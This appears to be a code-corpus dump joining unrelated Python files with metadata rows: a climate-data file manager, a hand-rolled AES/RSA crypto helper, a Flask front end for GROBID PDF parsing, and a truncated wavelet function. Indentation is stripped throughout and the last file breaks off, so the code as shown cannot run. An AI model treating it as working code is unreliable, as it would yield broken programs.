filestr += ' in transit, '
filestr += '\n\t remote_status: '
if datafile.remote_status == 0:
filestr += ' present'
elif datafile.remote_status == 1:
filestr += ' missing'
else:
filestr += ' in transit'
filestr += '\n\t local_size: ' + \
str(datafile.local_size)
filestr += '\n\t local_path: ' + datafile.local_path
filestr += '\n\t remote_path: ' + datafile.remote_path
filestr += '\n\t year: ' + str(datafile.year)
filestr += '\n\t month: ' + str(datafile.month) + '\n'
fp.write(filestr)
except Exception as e:
print_debug(e)
def check_data_ready(self, data_required, case, start_year=None, end_year=None):
try:
for datatype in data_required:
if start_year and end_year:
q = (DataFile
.select()
.where(
(DataFile.year >= start_year) &
(DataFile.year <= end_year) &
(DataFile.case == case) &
(DataFile.datatype == datatype)))
else:
q = (DataFile
.select()
.where(
(DataFile.case == case) &
(DataFile.datatype == datatype)))
datafiles = q.execute()
for df in datafiles:
if not os.path.exists(df.local_path) and df.local_status == FileStatus.PRESENT.value:
df.local_status = FileStatus.NOT_PRESENT.value
df.save()
elif os.path.exists(df.local_path) and df.local_status == FileStatus.NOT_PRESENT.value:
df.local_status = FileStatus.PRESENT.value
df.save()
if df.local_status != FileStatus.PRESENT.value:
return False
return True
except Exception as e:
print_debug(e)
def render_file_string(self, data_type, data_type_option, case, year=None, month=None):
"""
Takes strings from the data_types dict and replaces the keywords with the appropriate values
"""
# setup the replacement dict
start_year = int(self._config['simulations']['start_year'])
end_year = int(self._config['simulations']['end_year'])
replace = {
'PROJECT_PATH': self._config['global']['project_path'],
'REMOTE_PATH': self._config['simulations'][case].get('remote_path', ''),
'CASEID': case,
'REST_YR': '{:04d}'.format(start_year + 1),
'START_YR': '{:04d}'.format(start_year),
'END_YR': '{:04d}'.format(end_year),
'LOCAL_PATH': self._config['simulations'][case].get('local_path', '')
}
if year is not None:
replace['YEAR'] = '{:04d}'.format(year)
if month is not None:
replace['MONTH'] = '{:02d}'.format(month)
if self._config['data_types'][data_type].get(case):
if self._config['data_types'][data_type][case].get(data_type_option):
instring = self._config['data_types'][data_type][case][data_type_option]
for item in self._config['simulations'][case]:
if item.upper() in self._config['data_types'][data_type][case][data_type_option]:
instring = instring.replace(item.upper(), self._config['simulations'][case][item])
return instring
instring = self._config['data_types'][data_type][data_type_option]
for string, val in replace.items():
if string in instring:
instring = instring.replace(string, val)
return instring
def populate_file_list(self):
"""
Populate the database with the required DataFile entries
"""
msg = 'Creating file table'
print_line(
line=msg,
event_list=self._event_list)
newfiles = list()
start_year = int(self._config['simulations']['start_year'])
end_year = int(self._config['simulations']['end_year'])
with DataFile._meta.database.atomic():
# for each case
for case in self._config['simulations']:
if case in ['start_year', 'end_year', 'comparisons']:
continue
# for each data type
for _type in self._config['data_types']:
data_types_for_case = self._config['simulations'][case]['data_types']
if 'all' not in data_types_for_case:
if _type not in data_types_for_case:
continue
# setup the base local_path
local_path = self.render_file_string(
data_type=_type,
data_type_option='local_path',
case=case)
new_files = list()
if self._config['data_types'][_type].get('monthly') and self._config['data_types'][_type]['monthly'] in ['True', 'true', '1', 1]:
# handle monthly data
for year in range(start_year, end_year + 1):
for month in range(1, 13):
filename = self.render_file_string(
data_type=_type,
data_type_option='file_format',
case=case,
year=year,
month=month)
r_path = self.render_file_string(
data_type=_type,
data_type_option='remote_path',
case=case,
year=year,
month=month)
new_files.append({
'name': filename,
'remote_path': os.path.join(r_path, filename),
'local_path': os.path.join(local_path, filename),
'local_status': FileStatus.NOT_PRESENT.value,
'case': case,
'remote_status': FileStatus.NOT_PRESENT.value,
'year': year,
'month': month,
'datatype': _type,
'local_size': 0,
'transfer_type': self._config['simulations'][case]['transfer_type'],
'remote_uuid': self._config['simulations'][case].get('remote_uuid', ''),
'remote_hostname': self._config['simulations'][case].get('remote_hostname', '')
})
else:
# handle one-off data
filename = self.render_file_string(
data_type=_type,
data_type_option='file_format',
case=case)
r_path = self.render_file_string(
data_type=_type,
data_type_option='remote_path',
case=case)
new_files.append({
'name': filename,
'remote_path': os.path.join(r_path, filename),
'local_path': os.path.join(local_path, filename),
'local_status': FileStatus.NOT_PRESENT.value,
'case': case,
'remote_status': FileStatus.NOT_PRESENT.value,
'year': 0,
'month': 0,
'datatype': _type,
'local_size': 0,
'transfer_type': self._config['simulations'][case]['transfer_type'],
'remote_uuid': self._config['simulations'][case].get('remote_uuid', ''),
'remote_hostname': self._config['simulations'][case].get('remote_hostname', '')
})
tail, _ = os.path.split(new_files[0]['local_path'])
if not os.path.exists(tail):
os.makedirs(tail)
step = 50
for idx in range(0, len(new_files), step):
DataFile.insert_many(
new_files[idx: idx + step]).execute()
msg = 'Database update complete'
print_line(msg, self._event_list)
def verify_remote_files(self, client, case):
"""
Check that the user supplied file paths are valid for remote files
Parameters:
client: either an ssh_client or a globus_client
case: the case to check remote paths for
"""
if not self._config['global']['verify']:
return True
msg = 'verifying remote file paths'
print_line(msg, self._event_list)
data_types_to_verify = []
q = (DataFile
.select()
.where(
(DataFile.case == case) &
(DataFile.local_status != FileStatus.PRESENT.value)))
for datafile in q.execute():
if datafile.datatype not in data_types_to_verify:
data_types_to_verify.append(datafile.datatype)
found_all = True
for datatype in data_types_to_verify:
q = (DataFile
.select()
.where(
(DataFile.case == case) &
(DataFile.datatype == datatype)))
files = q.execute()
remote_path, _ = os.path.split(files[0].remote_path)
msg = 'Checking {} files in {}'.format(datatype, remote_path)
print_line(msg, self._event_list)
if files[0].transfer_type == 'globus':
from lib.globus_interface import get_ls as globus_ls
remote_contents = globus_ls(
client=client,
path=remote_path,
endpoint=self._config['simulations'][case]['remote_uuid'])
elif files[0].transfer_type == 'sftp':
from lib.ssh_interface import get_ls as ssh_ls
remote_contents = ssh_ls(
client=client,
remote_path=remote_path)
remote_names = [x['name'] for x in remote_contents]
for df in files:
if df.name not in remote_names:
msg = 'Unable to find file {name} at {remote_path}'.format(
name=df.name,
remote_path=remote_path)
print_message(msg, 'error')
found_all = False
if not found_all:
return False
else:
msg = 'found all remote files for {}'.format(case)
print_message(msg, 'ok')
return True
def terminate_transfers(self):
self.kill_event.set()
for thread in self.thread_list:
msg = 'terminating {}, this may take a moment'.format(thread.name)
print_line(msg, self._event_list)
thread.join()
def print_db(self):
for df in DataFile.select():
print {
'case': df.case,
'type': df.datatype,
'name': df.name,
'local_path': df.local_path,
'remote_path': df.remote_path,
'transfer_type': df.transfer_type,
}
def add_files(self, data_type, file_list):
"""
Add files to the database
Parameters:
data_type (str): the data_type of the new files
file_list (list): a list of dictionaries in the format
local_path (str): path to the file,
case (str): the case these files belong to
name (str): the filename
remote_path (str): the remote path of these files, optional
transfer_type (str): the transfer type of these files, optional
year (int): the year of the file, optional
month (int): the month of the file, optional
remote_uuid (str): remote globus endpoint id, optional
remote_hostname (str): remote hostname for sftp transfer, optional
"""
try:
new_files = list()
for file in file_list:
new_files.append({
'name': file['name'],
'local_path': file['local_path'],
'local_status': file.get('local_status', FileStatus.NOT_PRESENT.value),
'datatype': data_type,
'case': file['case'],
'year': file.get('year', 0),
'month': file.get('month', 0),
'remote_uuid': file.get('remote_uuid', ''),
'remote_hostname': file.get('remote_hostname', ''),
'remote_path': file.get('remote_path', ''),
'remote_status': FileStatus.NOT_PRESENT.value,
'local_size': 0,
'transfer_type': file.get('transfer_type', 'local')
})
step = 50
for idx in range(0, len(new_files), step):
DataFile.insert_many(
new_files[idx: idx + step]).execute()
except Exception as e:
print_debug(e)
def update_local_status(self):
"""
Update the database with the local status of the expected files
Return True if there was new local data found, False otherwise
"""
try:
query = (DataFile
.select()
.where(
(DataFile.local_status == FileStatus.NOT_PRESENT.value) |
(DataFile.local_status == FileStatus.IN_TRANSIT.value)))
printed = False
change = False
for datafile in query.execute():
marked = False
if os.path.exists(datafile.local_path):
if datafile.local_status == FileStatus.NOT_PRESENT.value or datafile.local_status == FileStatus.IN_TRANSIT.value:
datafile.local_status = FileStatus.PRESENT.value
marked = True
change = True
else:
if datafile.transfer_type == 'local':
msg = '{case} transfer_type is local, but {filename} is not present'.format(
case=datafile.case, filename=datafile.name)
logging.error(msg)
if not printed:
print_line(msg, self._event_list)
printed = True
if datafile.local_status == FileStatus.PRESENT.value:
datafile.local_status = FileStatus.NOT_PRESENT.value
marked = True
if marked:
datafile.save()
except Exception as e:
print_debug(e)
return change
def all_data_local(self):
"""
Returns True if all data is local, False otherwise
"""
try:
query = (DataFile
.select()
.where(
(DataFile.local_status == FileStatus.NOT_PRESENT.value) |
(DataFile.local_status == FileStatus.IN_TRANSIT.value)))
missing_data = query.execute()
# if any of the data is missing, not all data is local
if missing_data:
logging.debug('All data is not local, missing the following')
logging.debug([x.name for x in missing_data])
return False
except Exception as e:
print_debug(e)
logging.debug('All data is local')
return True
def transfer_needed(self, event_list, event, config):
"""
Start a transfer job for any files that aren't local but do exist remotely
Globus user must already be logged in
"""
# required files don't exist locally but do exist remotely,
# or they exist locally with a different local and remote size
target_files = list()
try:
q = (DataFile
.select(DataFile.case)
.where(
DataFile.local_status == FileStatus.NOT_PRESENT.value))
caselist = [x.case for x in q.execute()]
if not caselist or len(caselist) == 0:
return
cases = list()
for case in caselist:
if case not in cases:
cases.append(case)
for case in cases:
q = (DataFile
.select()
.where(
(DataFile.case == case) &
(DataFile.local_status == FileStatus.NOT_PRESENT.value)))
required_files = [x for x in q.execute()]
for file in required_files:
if file.transfer_type == 'local':
required_files.remove(file)
if not required_files:
msg = 'ERROR: all missing files are marked as local'
print_line(msg, event_list)
return
# mark files as in-transit so we don't double-copy
# can't do a bulk update since there may be too many records for the db to handle
step = 50
for idx in range(0, len(required_files), step):
q = (DataFile
.update({DataFile.local_status: FileStatus.IN_TRANSIT})
.where(DataFile.name << [x.name for x in required_files[idx: step + idx]]))
q.execute()
for file in required_files:
target_files.append({
'local_path': file.local_path,
'remote_path': file.remote_path,
})
if required_files[0].transfer_type == 'globus':
from lib.globus_interface import transfer as globus_transfer
from globus_cli.services.transfer import get_client as get_globus_client
msg = 'Starting globus file transfer of {} files'.format(
len(required_files))
print_line(msg, event_list)
msg = 'See https://www.globus.org/app/activity for transfer details'
print_line(msg, event_list)
client = get_globus_client()
if not self.verify_remote_files(client=client, case=case):
return False
remote_uuid = required_files[0].remote_uuid
local_uuid = self._config['global']['local_globus_uuid']
thread_name = '{}_globus_transfer'.format(required_files[0].case)
_args = (client, remote_uuid,
local_uuid, target_files,
self.kill_event)
thread = Thread(
target=globus_transfer,
name=thread_name,
args=_args)
self.thread_list.append(thread)
thread.start()
elif required_files[0].transfer_type == 'sftp':
from lib.ssh_interface import get_ssh_client
msg = 'Starting sftp file transfer of {} files'.format(
len(required_files))
print_line(msg, event_list)
client = get_ssh_client(required_files[0].remote_hostname)
if not self.verify_remote_files(client=client, case=case):
return False
thread_name = '{}_sftp_transfer'.format(required_files[0].case)
_args = (target_files, client, self.kill_event)
thread = Thread(
target=self._ssh_transfer,
name=thread_name,
args=_args)
self.thread_list.append(thread)
thread.start()
except Exception as e:
print_debug(e)
return False
def _ssh_transfer(self, target_files, client, event):
from lib.ssh_interface import transfer as ssh_transfer
sftp_client = client.open_sftp()
for file in target_files:
if event.is_set():
return
_, filename = os.path.split(file['local_path'])
msg = 'sftp transfer from {} to {}'.format(
file['remote_path'], file['local_path'])
logging.info(msg)
msg = 'starting sftp transfer for {}'.format(filename)
print_line(msg, self._event_list)
ssh_transfer(sftp_client, file)
msg = 'sftp transfer complete for {}'.format(filename)
print_line(msg, self._event_list)
msg = self.report_files_local()
print_line(msg, self._event_list)
def report_files_local(self):
"""
Return a string in the format 'X of Y files available locally', where X is the number of files present locally and Y is the total
"""
q = (DataFile
.select(DataFile.local_status)
.where(DataFile.local_status == FileStatus.PRESENT.value))
local = len([x.local_status for x in q.execute()])
q = (DataFile.select(DataFile.local_status))
total = len([x.local_status for x in q.execute()])
msg = '{local}/{total} files available locally or {prec:.2f}%'.format(
local=local, total=total, prec=((local*1.0)/total)*100)
return msg
def get_file_paths_by_year(self, datatype, case, start_year=None, end_year=None):
"""
Return paths to files that match the given type, start, and end year
Parameters:
datatype (str): the type of data
case (str): the name of the case to return files for
start_year (int): the first year to return data for
end_year (int): the last year to return data for
"""
try:
if start_year and end_year:
if datatype in ['climo_regrid', 'climo_native', 'ts_regrid', 'ts_native']:
query = (DataFile
.select()
.where(
(DataFile.month == end_year) &
(DataFile.year == start_year) &
(DataFile.case == case) &
(DataFile.datatype == datatype) &
(DataFile.local_status == FileStatus.PRESENT.value)))
else:
query = (DataFile
.select()
.where(
(DataFile.year <= end_year) &
(DataFile.year >= start_year) &
(DataFile.case == case) &
(DataFile.datatype == datatype) &
(DataFile.local_status == FileStatus.PRESENT.value)))
else:
query = (DataFile
.select()
.where(
(DataFile.case == case) &
(DataFile.datatype == datatype) &
(DataFile.local_status == FileStatus.PRESENT.value)))
datafiles = query.execute()
if datafiles is None or len(datafiles) == 0:
return None
return [x.local_path for x in datafiles]
except Exception as e:
print_debug(e)
| 44.313364 | 149 | 0.475284 | [
"MIT"
] | jhkennedy/processflow | lib/filemanager.py | 28,848 | Python |
import os
import base64
from Crypto import Random
from Crypto.Cipher import AES
from Crypto.PublicKey import RSA
from Crypto.Hash import MD5
from Crypto.Hash import SHA
from Crypto.Hash import SHA256
## needs to be imported from hashlib, libcrypto
## versions do not have a block_size member var
from hashlib import sha256 as HMAC_HASH
from hmac import HMAC as HMAC_FUNC
try:
from Crypto.Cipher import PKCS1_OAEP as RSA_PAD_SCHEME
except ImportError:
RSA_PAD_SCHEME = None
try:
from Crypto.Signature import PKCS1_v1_5 as RSA_SGN_SCHEME
except ImportError:
RSA_SGN_SCHEME = None
## needed because RSAobj::operator== fails on None
RSA_NULL_KEY_OBJ = RSA._RSAobj(None, None)
AES_KEY_BIT_SIZE = 32 * 8
AES_KEY_DIR_NAME = "./"
AES_RAW_KEY_FILE = "aes_key.dat"
AES_MSG_PAD_SIZE = 64
RSA_KEY_BIT_SIZE = 8192
RSA_KEY_FMT_NAME = "PEM"
RSA_KEY_DIR_NAME = "./"
RSA_PUB_KEY_FILE = "rsa_pub_key.pem"
RSA_PRI_KEY_FILE = "rsa_pri_key.pem"
DATA_MARKER_BYTE = "\x01"
DATA_PARTIT_BYTE = "\n"
UNICODE_ENCODING = "utf-8"
PWRD_HASH_ROUNDS = 1024 ## stretching KDF (anti-BFA)
USR_DB_SALT_SIZE = 16 ## bytes
MIN_AES_KEY_SIZE = 16 ## bytes
MIN_PASSWORD_LEN = 12 ## bytes
## hashlib.sha{1,256}
MD5LEG_HASH_FUNC = MD5.new
SHA256_HASH_FUNC = SHA256.new
GLOBAL_RAND_POOL = Random.new()
def null_encode(s): return s
def null_decode(s): return s
def safe_decode(s, decode_func = base64.b64decode):
try:
r = decode_func(s)
except:
## if <s> is not a base64-encoded string, then
## it probably contains plaintext (UTF-8) data
r = s
return r
def extract_message_and_auth_code(raw_data_blob):
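## Expected blob layout (sketch): DATA_MARKER_BYTE + enc_msg, optionally followed
## by DATA_MARKER_BYTE + msg_mac, i.e. "\x01<ciphertext>[\x01<mac digest>]"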
if (raw_data_blob[0] != DATA_MARKER_BYTE):
return ("", "")
i = 1
j = raw_data_blob.find(DATA_MARKER_BYTE, i)
## check if a MAC is included after the payload
if (j != -1):
msg = raw_data_blob[i : j]
mac = raw_data_blob[j + 1: ]
else:
msg = raw_data_blob[i: ]
mac = ""
return (msg, mac)
def encrypt_sign_message(aes_obj, raw_msg, use_macs):
assert(type(raw_msg) == str)
assert(isinstance(aes_obj, aes_cipher))
ret_enc_msg = ""
ret_msg_mac = ""
if (use_macs):
## enc_msg_mac := (enc_msg, msg_mac)
enc_msg_mac = aes_obj.encrypt_sign_bytes(raw_msg)
ret_enc_msg = DATA_MARKER_BYTE + enc_msg_mac[0]
ret_msg_mac = DATA_MARKER_BYTE + enc_msg_mac[1]
else:
raw_enc_msg = aes_obj.encrypt_encode_bytes(raw_msg)
ret_enc_msg = DATA_MARKER_BYTE + raw_enc_msg
return (ret_enc_msg + ret_msg_mac + DATA_PARTIT_BYTE)
def decrypt_auth_message(aes_obj, raw_msg, use_macs):
assert(type(raw_msg) == str)
assert(isinstance(aes_obj, aes_cipher))
## enc_msg_mac := (enc_msg, msg_mac)
enc_msg_mac = extract_message_and_auth_code(raw_msg)
## missing lead marker byte
if (len(enc_msg_mac[0]) == 0):
return ""
if (use_macs):
dec_msg = aes_obj.auth_decrypt_bytes(enc_msg_mac, safe_decode)
else:
dec_msg = aes_obj.decode_decrypt_bytes(enc_msg_mac[0], safe_decode)
return dec_msg
def verify_message_auth_code(our_mac, msg_mac, ses_key):
## two rounds closes a timing side-channel
msg_mac = HMAC_FUNC(ses_key, msg_mac, HMAC_HASH)
our_mac = HMAC_FUNC(ses_key, our_mac, HMAC_HASH)
msg_mac = msg_mac.digest()
our_mac = our_mac.digest()
num_val = 0
if (len(msg_mac) != len(our_mac)):
return False
## fixed linear-time comparison closes another
for i in xrange(len(our_mac)):
num_val += (our_mac[i] == msg_mac[i])
return (num_val == len(our_mac))
def int32_to_str(n):
assert(n >= (0 ))
assert(n < (1 << 32))
s = ""
s += "%c" % ((n >> 0) & 0xff)
s += "%c" % ((n >> 8) & 0xff)
s += "%c" % ((n >> 16) & 0xff)
s += "%c" % ((n >> 24) & 0xff)
return s
def str_to_int32(s):
n = 0
n += (ord(s[0]) << 0)
n += (ord(s[1]) << 8)
n += (ord(s[2]) << 16)
n += (ord(s[3]) << 24)
return n
def pad_str(msg, bs):
num = bs - (len(msg) % bs)
ext = num * chr(num)
return (msg + ext)
def unpad_str(msg, bs):
idx = len(msg) - 1
cnt = ord(msg[idx: ])
return msg[0: -cnt]
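## worked example: with bs=16, pad_str("abc", 16) appends 13 copies of chr(13) so the
## result length is a multiple of the block size; unpad_str reads the last byte (13)
## and strips that many characters, recovering "abc"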
def read_file(file_name, file_mode):
try:
f = open(file_name, file_mode)
s = f.read()
f = f.close()
return s
except IOError:
pass
return ""
def write_file(file_name, file_mode, file_data):
try:
f = open(file_name, file_mode)
os.fchmod(f.fileno(), 0600)
f.write("%s" % file_data)
f = f.close()
except IOError:
pass
class rsa_cipher:
def __init__(self, key_dir = RSA_KEY_DIR_NAME):
self.set_rnd_gen(Random.new())
self.set_instance_keys(key_dir)
self.set_pad_scheme(RSA_PAD_SCHEME)
self.set_sgn_scheme(RSA_SGN_SCHEME)
def set_rnd_gen(self, rnd_gen): self.rnd_gen = rnd_gen
def set_pub_key(self, pub_key): self.pub_key = pub_key
def set_pri_key(self, pri_key): self.pri_key = pri_key
def get_pub_key(self): return self.pub_key
def get_pri_key(self): return self.pri_key
def sanity_test_keys(self):
pk = (self.pri_key.publickey())
b0 = (pk == self.pub_key)
b1 = (pk.exportKey(RSA_KEY_FMT_NAME) == self.pub_key.exportKey(RSA_KEY_FMT_NAME))
b2 = ((not self.pub_key.has_private()) and self.pri_key.has_private())
return (b0 and b1 and b2)
def set_pad_scheme(self, scheme):
if (scheme == None):
self.enc_pad_scheme = None
self.dec_pad_scheme = None
else:
self.enc_pad_scheme = scheme.new(self.pub_key)
self.dec_pad_scheme = scheme.new(self.pri_key)
def set_sgn_scheme(self, scheme):
if (scheme == None):
self.msg_sign_scheme = None
self.msg_auth_scheme = None
else:
self.msg_sign_scheme = scheme.new(self.pri_key)
self.msg_auth_scheme = scheme.new(self.pub_key)
def set_instance_keys(self, key_dir):
if (key_dir == None):
self.set_pub_key(RSA_NULL_KEY_OBJ)
self.set_pri_key(RSA_NULL_KEY_OBJ)
return
if (not self.import_keys(key_dir)):
self.generate_keys()
assert(self.sanity_test_keys())
def generate_keys(self, num_bits = RSA_KEY_BIT_SIZE):
self.set_pri_key(RSA.generate(num_bits, self.rnd_gen.read))
self.set_pub_key(self.pri_key.publickey())
return True
def import_key(self, key_str):
return (RSA.importKey(key_str))
def import_keys(self, key_dir):
assert(len(key_dir) == 0 or key_dir[-1] == '/')
pub_key_str = read_file(key_dir + RSA_PUB_KEY_FILE, "r")
pri_key_str = read_file(key_dir + RSA_PRI_KEY_FILE, "r")
if (len(pub_key_str) != 0 and len(pri_key_str) != 0):
self.set_pub_key(self.import_key(pub_key_str))
self.set_pri_key(self.import_key(pri_key_str))
return True
return False
def export_keys(self, key_dir):
assert(len(key_dir) != 0)
assert(key_dir[-1] == '/')
if (not os.path.isdir(key_dir)):
os.mkdir(key_dir, 0700)
write_file(key_dir + RSA_PUB_KEY_FILE, "w", self.pub_key.exportKey(RSA_KEY_FMT_NAME))
write_file(key_dir + RSA_PRI_KEY_FILE, "w", self.pri_key.exportKey(RSA_KEY_FMT_NAME))
## these make sure that any native unicode inputs are converted
## to standard (UTF-8 encoded byte sequences) strings, otherwise
## crypto operations might be undefined
def encrypt_encode_bytes_utf8(self, raw_bytes, encode_func = base64.b64encode):
return (self.encrypt_encode_bytes(raw_bytes.encode(UNICODE_ENCODING), encode_func))
def decode_decrypt_bytes_utf8(self, enc_bytes, decode_func = base64.b64decode):
return (self.decode_decrypt_bytes(enc_bytes.encode(UNICODE_ENCODING), decode_func))
def encrypt_encode_bytes(self, raw_bytes, encode_func = base64.b64encode):
assert(type(raw_bytes) == str)
assert(len(raw_bytes) != 0)
assert(self.pub_key.size() >= (len(raw_bytes) * 8))
assert(ord(raw_bytes[0]) != 0)
if (self.enc_pad_scheme != None):
enc_bytes = self.enc_pad_scheme.encrypt(raw_bytes)
else:
## NOTE: RSAobj.encrypt() returns a tuple (!)
enc_bytes = self.pub_key.encrypt(raw_bytes, "")[0]
return (encode_func(enc_bytes))
def decode_decrypt_bytes(self, enc_bytes, decode_func = base64.b64decode):
assert(type(enc_bytes) == str)
assert(len(enc_bytes) != 0)
## assert((self.pri_key.size() + 1) == (len(decode_func(enc_bytes)) * 8))
enc_bytes = decode_func(enc_bytes)
if (self.dec_pad_scheme != None):
dec_bytes = self.dec_pad_scheme.decrypt(enc_bytes)
else:
dec_bytes = self.pri_key.decrypt(enc_bytes)
return dec_bytes
def sign_bytes_utf8(self, msg_bytes):
return (self.sign_bytes(msg_bytes.encode(UNICODE_ENCODING)))
def auth_bytes_utf8(self, msg_bytes, sig_bytes):
return (self.auth_bytes(msg_bytes.encode(UNICODE_ENCODING), sig_bytes))
def sign_bytes(self, msg_bytes):
assert(type(msg_bytes) == str)
assert(len(msg_bytes) != 0)
msg_bytes = SHA256_HASH_FUNC(msg_bytes)
if (self.msg_sign_scheme != None):
## scheme.sign() expects an object from Crypto.Hash
ret = self.msg_sign_scheme.sign(msg_bytes)
else:
## RSAobj.sign() returns a tuple
ret = str(self.pri_key.sign(msg_bytes.digest(), "")[0])
assert(type(ret) == str)
return ret
def auth_bytes(self, msg_bytes, sig_bytes):
assert(type(msg_bytes) == str)
assert(type(sig_bytes) == str)
assert(len(msg_bytes) != 0)
msg_bytes = SHA256_HASH_FUNC(msg_bytes)
if (self.msg_auth_scheme != None):
## scheme.verify() expects an object from Crypto.Hash
ret = self.msg_auth_scheme.verify(msg_bytes, sig_bytes)
else:
## RSAobj.verify() expects a tuple
ret = (self.pub_key.verify(msg_bytes.digest(), (long(sig_bytes), 0L)))
assert(type(ret) == bool)
return ret
class aes_cipher:
def __init__(self, key_dir = AES_KEY_DIR_NAME, padding_length = AES_MSG_PAD_SIZE):
assert(type(key_dir) == str)
assert((padding_length % 16) == 0)
self.pad_length = padding_length
self.random_gen = Random.new()
self.khash_func = SHA256_HASH_FUNC
self.set_instance_key(key_dir)
def set_instance_key(self, key_dir):
if (not self.import_key(key_dir)):
self.set_key(self.generate_key(""))
def generate_key(self, raw_key, key_len = AES_KEY_BIT_SIZE):
if (len(raw_key) == 0):
key_str = self.random_gen.read(key_len / 8)
key_str = self.khash_func(key_str)
else:
key_str = self.khash_func(raw_key)
return (key_str.digest())
def get_key(self): return self.key_string
def set_key(self, s): self.key_string = s
def import_key(self, key_dir):
assert(len(key_dir) == 0 or key_dir[-1] == '/')
key_str = read_file(key_dir + AES_RAW_KEY_FILE, "rb")
if (len(key_str) != 0):
self.set_key(key_str)
return True
return False
def export_key(self, key_dir):
assert(len(key_dir) != 0)
assert(key_dir[-1] == '/')
if (not os.path.isdir(key_dir)):
os.mkdir(key_dir, 0700)
write_file(key_dir + AES_RAW_KEY_FILE, "wb", self.get_key())
def encrypt_encode_bytes_utf8(self, raw_bytes, encode_func = base64.b64encode):
return (self.encrypt_encode_bytes(raw_bytes.encode(UNICODE_ENCODING), encode_func))
def decode_decrypt_bytes_utf8(self, enc_bytes, decode_func = base64.b64decode):
return (self.decode_decrypt_bytes(enc_bytes.encode(UNICODE_ENCODING), decode_func))
def encrypt_encode_bytes(self, raw_bytes, encode_func = base64.b64encode):
assert(type(raw_bytes) == str)
assert(len(raw_bytes) != 0)
ini_vector = self.random_gen.read(AES.block_size)
aes_object = AES.new(self.key_string, AES.MODE_CBC, ini_vector)
pad_bytes = pad_str(raw_bytes, self.pad_length)
enc_bytes = aes_object.encrypt(pad_bytes)
return (encode_func(ini_vector + enc_bytes))
def decode_decrypt_bytes(self, enc_bytes, decode_func = base64.b64decode):
assert(type(enc_bytes) == str)
assert(len(enc_bytes) != 0)
enc_bytes = decode_func(enc_bytes)
ini_vector = enc_bytes[0: AES.block_size]
aes_object = AES.new(self.key_string, AES.MODE_CBC, ini_vector)
dec_bytes = aes_object.decrypt(enc_bytes[AES.block_size: ])
dec_bytes = unpad_str(dec_bytes, self.pad_length)
return dec_bytes
def encrypt_sign_bytes_utf8(self, raw_msg, encode_func = base64.b64encode):
return (self.encrypt_sign_bytes(raw_msg.encode(UNICODE_ENCODING), encode_func))
def auth_decrypt_bytes_utf8(self, (enc_msg, msg_mac), decode_func = base64.b64decode):
return (self.auth_decrypt_bytes((enc_msg.encode(UNICODE_ENCODING), msg_mac.encode(UNICODE_ENCODING)), decode_func))
def encrypt_sign_bytes(self, raw_msg, encode_func = base64.b64encode):
assert(type(raw_msg) == str)
## encrypt, then sign (HMAC = H((K ^ O) | H((K ^ I) | M)))
enc_msg = self.encrypt_encode_bytes(raw_msg, null_encode)
msg_mac = HMAC_FUNC(self.get_key(), enc_msg, HMAC_HASH)
msg_mac = encode_func(msg_mac.digest())
enc_msg = encode_func(enc_msg)
return (enc_msg, msg_mac)
def auth_decrypt_bytes(self, (enc_msg, msg_mac), decode_func = base64.b64decode):
assert(type(enc_msg) == str)
assert(type(msg_mac) == str)
## auth, then decrypt
msg_mac = decode_func(msg_mac)
enc_msg = decode_func(enc_msg)
our_mac = HMAC_FUNC(self.get_key(), enc_msg, HMAC_HASH)
our_mac = our_mac.digest()
if (verify_message_auth_code(our_mac, msg_mac, self.get_key())):
return (self.decode_decrypt_bytes(enc_msg, null_decode))
## counts as false
return ""
| 27.33617 | 117 | 0.721357 | [
"MIT"
] | Anarchid/uberserver | CryptoHandler.py | 12,848 | Python |
from flask import Flask
from flask import request, session, render_template, json, Response, jsonify, make_response, send_file, redirect, url_for
import requests
import xml.etree.ElementTree as ET
import lxml
import pandas as pd
import re
app = Flask(__name__)
@app.route('/')
def index():
return render_template('process_fulltext.html')
@app.route('/process_fulltext', methods = ['GET', 'POST'])
def process_fulltext():
upload = request.files.get('file', '').read()  # read the uploaded file from the request
url = 'http://localhost:8070/api/processFulltextDocument'
files = dict(input=upload, teiCoordinates="biblStruct")
r = requests.post(url, files=files)
return render_template('process_fulltext.html', r=r.text)
# takes a string and removes xml element inside
def clean(text):
text = re.sub("<[^>]+>","", text)
text = re.sub("^\s+|\s+$","", text)
return text
#parses the tei document and creates list of dictionaries out of tei elements
def parse_tei(xml):
#data = open(xml)
data = xml.split('\n')
refs = []
ref = []
start = False
title = ""
name = ""
date = ""
names = []
year = ""
#art_name = re.sub(".*\/","")
old_ref = {"title": "", "name": "", "date": "", "year_pub": ""}
for line in data:
if re.match(".*<date",line) and start == False:
year = re.sub(".*when\=\"","",line)
year = re.sub("\".*","",year)[0:4]
if start == False and re.match(".*<back",line):
start = True
if start == False:
continue
if re.match(".*<biblStruct",line):
if title == "":
continue
ref = {"title": title, "name": names, "date": date, "year_pub": year}
if ref["title"] == old_ref["title"]:
continue
else:
refs.append(ref)
old_ref = ref
names = []
if re.match(".*<title.*type=\"main\"",line):
title = clean(line)
if re.match(".*<persName",line):
forename = re.sub("<\/forename.*","",line)
forename = clean(forename)
surname = re.sub(".*<surname","",line)
surname = clean(surname)
surname = re.sub(">",". ",surname)
name = forename+surname
names.append(name)
if re.match(".*<date",line):
date = re.sub(".*when\=\"","",line)
date = re.sub("\".*","",date)
date = date[0:4]
return refs
# sends request to grobid api to process the pdf and returns data in dataframe to template view
@app.route('/process_references', methods = ['GET', 'POST'])
def process_references():
upload = request.files.get('file', '').read()  # read the uploaded file from the request
url = 'http://localhost:8070/api/processFulltextDocument'
files = dict(input=upload, teiCoordinates="biblStruct")
r = requests.post(url, files=files)
tei_list = parse_tei(r.text)
# increase the column width of pd (standard is only 50px)
pd.set_option('display.max_colwidth', -1)
df1 = pd.DataFrame(tei_list)
# removing year_pub column
df1 = df1.drop('year_pub', axis=1)
df2 = df1.to_json()
df1 = df1.to_html()
# changing css class in html for dataframe output
df1 = re.sub("dataframe", "myTable", df1)
return render_template('process_fulltext.html', df1=df1, df2=df2)
if __name__ == '__main__':
app.run(debug=True) | 27.473684 | 121 | 0.646232 | [
"Apache-2.0"
] | DARIAH-ERIC/DESIR-CodeSprint-TrackA-TextMining | TrackA_python/codesprintapp/views.py | 3,132 | Python |
import math
import numpy as np
from cpp2py_test.bior_2d_forward_test1 import original_bior_2d_forward, bior15_coef
def bior_2d_forward(img):
assert img.shape[0] == img.shape[1]
N = img.shape[0]
iter_max = int(math.log2(N))
for iter in range(iter_max):
coeffs2 = pywt.dwt2(img[:N, :N], 'bior1.5', mode='periodic')
LL, (LH, HL, HH) = coeffs2
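# place the trimmed sub-bands into the quadrants of the working array:
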